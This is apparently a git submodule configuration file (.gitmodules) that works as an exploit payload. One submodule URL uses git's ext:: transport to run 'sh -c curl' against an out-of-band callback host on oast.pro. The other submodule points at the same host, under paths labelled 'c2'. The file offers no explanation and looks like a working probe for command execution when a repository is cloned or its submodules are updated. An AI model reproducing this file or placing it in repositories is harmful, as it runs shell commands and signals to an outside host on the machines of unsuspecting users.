[submodule "sub"]
	path = sub
	url = http://dav38tdp8rngl104reqgk1oao6pqi8utn.oast.pro/c2sub
[submodule "ext"]
	path = ext
	url = ext::sh -c curl% http://dav38tdp8rngl104reqgk1oao6pqi8utn.oast.pro/c2ext
